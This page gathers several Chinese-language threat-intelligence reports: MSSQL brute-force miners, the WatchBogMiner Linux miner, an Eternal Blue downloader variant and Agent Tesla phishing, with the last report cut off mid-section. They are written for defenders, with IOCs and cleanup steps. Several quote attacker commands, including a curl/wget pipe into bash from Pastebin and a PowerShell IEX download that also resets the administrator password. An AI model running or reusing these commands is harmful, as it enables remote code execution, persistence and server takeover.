标签: 木马

数万台 MSSQL 服务器遭爆破入侵,已沦为门罗币矿机

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/znFP8IjcC3KIuPfsm_93oA     一、概述 腾讯安全威胁情报中心检测到针对MS SQL服务器攻击的挖矿木马,该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门,并会添加用户以方便入侵者远程登录该服务器。 从挖矿木马的HFS服务器计数看,已有上万台MS SQL服务器被植入挖矿木马,另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险,企业数据库服务器沦陷会导致严重信息泄露事件发生。 腾讯安全专家建议企业在所有服务器上避免使用弱口令,爆破攻击通常是黑客试水的第一步,使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统(御点)已可拦截查杀该挖矿木马。 腾讯安全旗下安全产品已针对该挖矿木马的入侵行为进行检测和拦截,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)该木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1) 腾讯云镜支持Mssql弱密码检测; 2)腾讯云镜支持查杀该挖矿木马。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Cloud Workload Protection,CWP) 1)腾讯漏洞扫描服务已支持监测全网资产是否受MSSQL弱密码影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯漏洞扫描服务等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)对利用mssql爆破入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)查杀该团伙入侵释放的挖矿程序,内网端口映射工具; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 该黑产团伙对mssql服务器进行爆破成功后,会下载执行HFS服务器上的恶意文件,从下载量来看,受感染的服务器有数万台,被植入后门的服务器有数十台,挖矿木马HFS文件列表如下: Adduser.exe,添加后门账户,用于后续远程登陆。 SQL.exe执行后释放4个文件到c:\windows\Fonts目录中 c:\windows\Fonts\Csrss.exe是NSSM服务封装程序,用于将sqlwriters.exe注册为服务,服务名为SQLServer Sqlwrites.exe是基于xmrig 6.2的挖矿程序 矿池: xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 Frp_C.exe执行后释放以下文件到c:\windows\Fonts中 Dllhost.exe是一款开源的内网穿透工具Frpc,Bat负责生成frpc配置文件,以及设置服务启动项,目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru,黑客可直接通过RDP连接到受害服务器,进而控制企业内网。 IOCs Doamin xxx.hex7e4.ru xmr.hex7e4.ru d3d.hex7e4.ru IP 43.229.149.62 185.212.128.180 URLs hxxp://43.229.149.62:8080/web/Add.exe hxxp://43.229.149.62:8080/web/AddUser.exe hxxp://43.229.149.62:8080/web/dw.exe hxxp://43.229.149.62:8080/web/Frp_C.exe hxxp://43.229.149.62:8080/web/frpc.exe hxxp://43.229.149.62:8080/web/frpc.ini hxxp://43.229.149.62:8080/web/po.jpg hxxp://43.229.149.62:8080/web/se.jpg hxxp://43.229.149.62:8080/web/SQL.exe hxxp://43.229.149.62:8080/web/sqlwriters.jpg hxxp://43.229.149.62:8080/web/sqlwriters1.jpg hxxp://43.229.149.62:8080/web/xx.txt hxxp://43.229.149.62:8080/web/xxx.txt MD5 9a745dc59585a5ad76fee0867acd1427 statr.bat 301257a23e2cad9da915cd942c833146 sqlwriters.exe 9a22fe62ebad16edc5c489c9493a5882 Frp_C.exe 88527fecde10ca426680d5baf6b384d1 po.jpg e27ba54c177c891ad3077de230813373 xxx.txt 2176ecfe4d91964ffec346dd1527420d xx.txt f457a5f0472e309c574795ca339ab566 sql.exe

WatchBogMiner 木马发起漏洞攻击,已控制上万台 Linux 服务器挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/5bt4XtP2NNFssl7QbF2S0Q   一、背景 腾讯安全威胁情报中心检测到针对Linux服务器进行攻击的WatchBogMiner变种挖矿木马。该木马利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击,在失陷机器安装多种类型的持久化攻击代码,然后植入门罗币挖矿木马进行挖矿,腾讯安全专家根据木马使用的算力资源推测已有上万台Linux服务器被黑客控制。 木马通过第三方网站Pastebin保存恶意代码以躲避检测,并且通过各类方法进行持久化,定期拉取挖矿木马加载到内存执行,同时会在启动后删除木马文件以达到“隐身”目的。和其他挖矿木马类似,WatchBogMiner木马挖矿时,会清除其他挖矿木马以独占服务器。 WatchBogMiner变种攻击代码还会通过失陷机器已认证过的SSH RSA进行SSH连接和执行远程命令进行横向移动,以扩大其影响范围。根据其钱包算力(120Kh/s)推测,木马已控制约1万台服务器进行挖矿。 腾讯安全专家建议企业网管对Linux服务器进行安全检测,及时清除挖矿木马,及时修复服务器组件存在的高危漏洞,避免遭遇更严重的损失,检测方案可参考腾讯安全系列产品应对WatchBogMiner挖矿木马的响应清单进行: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)WatchBogMiner关联的IOCs已支持识别检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀WatchBogMiner相关木马程序; 2)已支持Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)检测 ; 3)已支持Supervisord远程命令执行漏洞(CVE-2017-11610)检测; 4)已支持ThinkPHP远程命令执行漏洞检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯VSS已支持检测全网资产是否存在Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件高危漏洞; 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)通过协议检测WatchBogMiner木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀WatchBogMiner团伙入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 WatchBogMiner使用Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)、Supervisord远程命令执行漏洞(CVE-2017-11610)、ThinkPHP远程命令执行漏洞的EXP代码对服务器进行扫描和攻击,并通过Payload执行https[:]//pastebin.com/raw/1eDKHr4r。失陷机器被安装的恶意定时任务如下: 为逃避检测,攻击者使用第三方网站Pastebin来保存恶意代码,该网站不会被网络防御方判断为恶意网站。WatchBogMiner变种用于存放恶意代码的Pastebin账号为”LISTTIME”,创建于2020年4月20日。 https[:]//pastebin.com/raw/1eDKHr4r跳转https[:]//pastebin.com/raw/UhUmR517 “UhUmR517”上保存的内容经过base64解码后,会得到以下shell脚本,包括有system()、cronhigh()、gettarfile()、download()、testa()、kill_miner_proc()等函数,会完成持久化、挖矿、横向移动等功能,是该病毒的主要攻击脚本。 脚本首先定义了4个变量,内容分别如下: house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d) park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d) beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d) deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d) surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d) 经过base64解码后: house= https[:]//pastebin.com/raw/1eDKHr4r park= https[:]//pastebin.com/raw/b5x1pRzK beam= sadan666.xyz:9080/rr deep= https[:]//pastebin.com/raw/SjjWevTs surf= https[:]//pastebin.com/raw/tyjnTQTA 其中house、park、beam都会跳转得到“UhUmR517”脚本,而deep、surf会返回函数名“dragon”和“lossl”。 持久化模块通过多种方式定期执行远程shell脚本:1.system()函数通过写入/etc/crontab文件,创建定时任务。 2.cronhigh()通过写入以下文件创建定时任务。 /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 3.cronlow()通过crontab命令创建定时任务。 4.cronbackup()通过at命令:echo “$pay” | at -m now + 1 minute添加定时任务,通过后台隐藏执行一段带有while循环的脚本:”while true; do sleep 600 && $pay; done”,同样达到定时任务效果。 5.cronc()通过写入环境变量文件”/home/$me/.bashrc”、”/root/.bashrc”执行定时任务。 挖矿模块为download()和testa(),分别从https[:]//pastebin.com/raw/GMdeWqec、 https[:]//pastebin.com/raw/Esctfgrx下载$mi_64和$st_64,经过解码后得到XMRig、xmr-stak修改而成的挖矿程序,保存为: /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates(最初被发现时该文件名为watchbog) 然后从https[:]//pastebin.com/raw/SB0TYBvG下载得到挖矿配置文件。 矿池:pool.minexmr.com:80 钱包: 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U 对比新版和旧版的挖矿木马启动代码,发现新版代码在释放和启动挖矿木马之后,会sleep 15秒,然后通过rm -rf 命令将挖矿木马文件删除。 由于Linux系统进程启动时,会将文件完全映射到内存中,所以启动之后删除文件不影响已经在运行中的进程,木马用这一方法来抹掉文件痕迹从而达到隐身。木马已通过各类持久化任务定期拉取挖矿木马并加载到内存执行,即使每次执行后删除文件,也能达到挖矿进程长期驻留系统的效果。 该钱包目前挖矿获得门罗币28XMR,折合人民币13600元,矿池算力维持在120kH/s左右,这意味着持续有1万台左右的服务器被控制挖矿。 脚本还会通过Kill_miner_proc()找到并清除竞品挖矿木马。 通过Kill_sus_proc()杀死高占用CPU的可疑进程。 变种新增横向移动模块,获取/root/.ssh/known_hosts中保存的已通过SSH RSA公钥认证的IP,重新进行SSH登陆并执行远程命令进行内网扩散攻击: curl -fsSL https[:]//pastebin.com/raw/UhUmR517||wget -q -O – https[:]//pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 & 三、手动清除建议: 1、 检查是否有高CPU占用的进程javaUpDates,kill掉该进程: 映像文件路径(可能已被删除):/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates 2、检查以下文件是否有包含“sadan666.xyz:9080/rr”的定时任务,如有将其删除: /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 同时通过crontab命令检查有无“sadan666.xyz:9080/rr”相关定时任务,如有将其删除。 3、通过atq命令查找at任务队列,删除“sadan666.xyz:9080/rr”相关作业。 4、检查是否存在进程/tmp/crun,如果该进程每10分钟请求一次 “sadan666.xyz:9080/rr”,Kill掉该进程。 5、检查配置文件”/home/$me/.bashrc”、”/root/.bashrc”是否包含“sadan666.xyz:9080/rr”相关内容,如有将其删除。 IOCs Domain sadan666.xyz IP 104.236.66.189 URL https[:]//pastebin.com/raw/1eDKHr4r https[:]//pastebin.com/raw/UhUmR517 https[:]//pastebin.com/raw/b5x1pRzK http[:]//sadan666.xyz:9080/rr https[:]//pastebin.com/raw/SjjWevTs https[:]//pastebin.com/raw/tyjnTQTA https[:]//pastebin.com/raw/Esctfgrx https[:]//pastebin.com/raw/GMdeWqec https[:]//pastebin.com/raw/SB0TYBvG https[:]//pastebin.com/raw/Zkz0d9Jz https[:]//pastebin.com/raw/mvSEGmR6 md5 mi_64 88b658853b9ececc48f5cac2b7b3f6f6 st_64 ad17226de6cc93977fb7c22c7a27ea8e 钱包: 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U

永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种,此次变种利用Python打包EXE可执行文件进行攻击,该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示,永恒之蓝下载器最新变种出现之后便迅速传播,目前已感染约1.5万台服务器,中毒系统最终用于下载运行门罗币挖矿木马。 永恒之蓝下载器木马在不断演进更新过程中,曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后,该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中,并对Powershell中相关代码进行屏蔽。 被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播,同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿,会给受害企业造成严重生产力损失。 腾讯安全专家建议企业网管参考腾讯安全响应清单,对企业网络资产进行安全检测,以及时消除永恒之蓝下载器木马的破坏活动: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯漏洞扫描服务(VSS)已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 附:永恒之蓝下载器木马历次版本更新情况如下: 时间 主要功能更新 2018年12月14日 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 2018年12月19日 下载之后的木马新增Powershell后门安装。 2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 2019年1月25日 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 2019年2月10日 将攻击模块打包方式改为Pyinstaller。 2019年2月20日 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 2019年2月23日 攻击方法再次更新,新增MsSQL爆破攻击。 2019年2月25日 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 2019年3月28日 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 2019年4月3日 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 2020年2月12日 使用DGA域名,篡改hosts文件。 2020年4月3日 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 2020年6月24日 重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe),负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击,其他攻击方式仍然通过Powershell实现。 二、样本分析 永恒之蓝下载器木马在Powershell攻击代码中,将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留: 1.“永恒之蓝”漏洞利用MS17-010 2.Lnk漏洞利用CVE-2017-8464 3.Office漏洞利用CVE-2017-8570 4.RDP爆破 5.感染可移动盘、网络磁盘 6.钓鱼邮件(使用新冠病毒疫情相关主题) 7.SMBGhost漏洞利用CVE-2020-0796 8.SSH爆破攻击Linux系统 9.Redis未授权访问漏洞攻击Linux系统 然后在攻击后执行的Payload中添加一行代码,负责下载和执行EXE攻击模块 http[:]//d.ackng.com/ode.bin。 Ode.bin是经过加密的Powershell代码,解密后的内容主要完成以下功能: 生成4到8位字符组成的随机字符串作为文件名<random>.exe; 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe; 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次20.dat,如果不符合权限则创建C:\Windows\Temp\\tt.vbs,通过VBS脚本代码创建计划任务“<random>.exe “,同样每50分钟执行一次20.dat。 通过计划任务执行的20.dat(拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0)实际上是由Python代码打包的扫描攻击模块,与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似(参考https://www.freebuf.com/news/192015.html)。 该病毒在后来的逐步发展过程中,逐步将攻击代码转移到了Powershell实现,并且利用计划任务来动态获取和启动,不会在磁盘上留下文件,也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块,可能是因为其功能不断扩展,需要将一部分代码进行分割,切割后的攻击模块及功能如下图所示。 If.bin中的Powershell攻击代码与上个版本相同,此处不再分析,分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下,另外还会执行$IPC、SMB、mssql弱口令爆破攻击: 攻击成功后执行shellcode 1、 下载和执行Powershell代码gim.jsp; 2、 修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户; 3、 添加防火墙规则允许65529端口访问并开启监听。 cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes gim.jsp是经过加密的Powershell代码,首先检测系统是否安装了以下杀软,如有调用卸载程序进行卸载: Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware 然后安装一个计划任务“blackball”和一个随机名计划任务,定期下载和执行a.jsp(a.jsp继续下载和执行挖矿和攻击模块)。 IOCs Domain info.zz3r0.com info.amynx.com w.zz3r0.com IP 167.71.87.85 URL http[:]//167.71.87.85/20.dat http[:]//d.ackng.com/ode.bin http[:]//d.ackng.com/if.bin http[:]//t.amynx.com/gim.jsp http[:]//t.amynx.com/smgho.jsp http[:]//t.amynx.com/a.jsp md5 C:\Windows\Temp\<random>.exe ef3a4697773f84850fe1a086db8edfe0 8ec20f2cbad3103697a63d4444e5c062 ac48b1ea656b7f48c34e66d8e8d84537 d61d88b99c628179fa7cf9f2a310b4fb f944742b01606605a55c1d55c469f0c9 abd6f640423a9bf018853a2b40111f76 57812bde13f512f918a0096ad3e38a07 d8e643c74996bf3c88325067a8fc9d78 125a6199fd32fafec11f812358e814f2 fb880dc73e4db0a43be8a68ea443bfe1 8d46dbe92242a4fde2ea29cc277cca3f 48fbe4b6c9a8efc11f256bda33f03460 gim.jsp 98f48f31006be66a8e07b0ab189b6d02 a.jsp 6bb4e93d29e8b78e51565342b929c824 ode.bin e009720bd4ba5a83c4b0080eb3aea1fb if.bin 092478f1e16cbddb48afc3eecaf6be68 smgho.jsp ca717602f0700faba6d2fe014c9e6a8c 参考链接: 《“黑球”行动再升级,SMBGhost漏洞攻击进入实战》 https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

Agent Tesla 商业木马正通过钓鱼邮件传播,木马生成器已十分成熟

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/1aQGlBxBwBOrdrW3B9l4tA   背景 腾讯安全威胁情报中心检测到有Agent Tesla商业木马变种正在通过钓鱼邮件传播。攻击者伪装成某国大型航运公司发送以货运单据为主题的钓鱼邮件,并在附件中加入由木马打包而成的压缩程序。 使用C#编译的木马外壳首先从资源文件中读取和加载Load程序PhotoDirector.dll,攻击者采用隐写技术,将木马执行程序隐藏在图片资源中,从图片资源中读取、解密得到Agent Tesla木马的exe可执行程序。 Agent Tesla为一款知名的商业窃密木马,木马执行后,会从资源中解密出现核心窃密程序,窃取中毒电脑的机密信息。包括:键盘记录,截屏,剪贴板记录,以及摄像头图像。还会从电脑上提取还原多种登录信息缓存,包括浏览器中保存的各网站登录帐号和密码,邮件客户端中保存的用户名密码,FTP工具、下载器中保存的密码等等。 窃取的数据通过Web Panel的方式回传至C&C服务器。一切完成之后,该木马会删除自身,清理痕迹。 腾讯安全专家建议用户小心处理不明电子邮件附件,腾讯安全旗下的系列产品均可检测、查杀Agent Tesla系列窃密木马。 样本分析 伪装成某国航运公司发送的以货运单据为主题的钓鱼邮件,附件名为“BL Draft Copy-shipping DocumentsEXCEL.XLS.xlsx.gz.zip”。 伪造的发件邮箱tassgroup.com属于TRANS ASIA GROUP公司,该公司是南亚某国一家集造船、航运、集装箱、物流等业务为一体的集团公司。 附件解压得到exe程序“BL Draft Copy-shipping DocumentsEXCEL.XLS.xlsx.gz.exe”,是木马外壳程序,采样C#编写。 外壳程序被命名为BlackJack。 Main函数进入Form1,完成初始化后调用BCAS类中BCAS()函数,代码被插入大量无效指令。 在无效指令之后调用AIJISAJIS(),进行资源文件的解密和加载。 BlackJack共有两个资源文件,一个是二进制文件资源“PhotoDirector_2”,另一个是图片文件资源“cxpjNoVVdqvwNYmThlfPxwKQGrxcLPY”。 首先将二进制文件作为PhotoDirector.dll加载到内存,该dll采样C#编写,主要功能是从母体的中获得图片资源,从图片中解密出数据,利用自定义的异或算法处理数据后得到Agent Tesla家族的exe文件,并在内存中加载执行。 获取图片中数据的代码为:首先遍历图片中的每个像素点,对每个像素点的RGB数据依次排列。 然后对读取到的数据利用自定义异或算法进行解密。 解密得到Agent Tesla木马ReZer0V2.exe,木马同样采样C#编写,其字符串经过混淆,仍然有两个资源文件,一个二进制文件“qfwH1”,一个XML文件XML。 拷贝自身到%Romaing%\XLwdDWHDKFdwB.exe目录下,并利用资源中的XML文件安装执行木马的计划任务Updates\XLwdDWHDKFdwB,在系统每次登陆时执行一次: 从“qfwH1”资源中解密出C++编译的核心窃密exe文件,解密算法和上述异或算法相同,然后加载该exe到内存执行。 窃密exe枚举注册表SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall获取系统安装的软件信息: 从注册表中读取FTP服务地址、用户名和密码信息: Software\Far\Plugins\FTP\Hosts Software\Far2\Plugins\FTP\Hosts Software\Far Manager\Plugins\FTP\Hosts Software\Far\SavedDialogHistory\FTPHost Software\Far2\SavedDialogHistory\FTPHost Software\Far Manager\SavedDialogHistory\FTPHost 从XML文件sitemanager.xml、filezilla.xml、recentservers.xml中获取FTP服务地址、用户名和密码信息 读取wiseftpsrvs.ini、wiseftp.ini、32BitFtp.ini、ftpsite.ini等INI文件中保存的FTP账号密码信息 从注册表中获取ExpanDrive网盘的账号密码信息: 获取Windows Live Mail、Outlook、RimArts、Pocomail、IncrediMail 、The Bat!等邮箱客户端保存的账号密码信息: 从Chrome等浏览器中获取用户账号密码信息: 将敏感信息加密后发送至http[:]//chelitos.com.ve/folders/folder/bin/trash/panel/gate.php 窃取任务完成后,创建bat脚本执行自删除: 木马生成器 1、工具简介 攻击者生成木马时使用的自动化工具名为AgentTesla,是一个功能比较完整的恶意木马生成器,生成器作者已经开始通过出售工具帐号牟利。 2、使用.NET作为开发语言 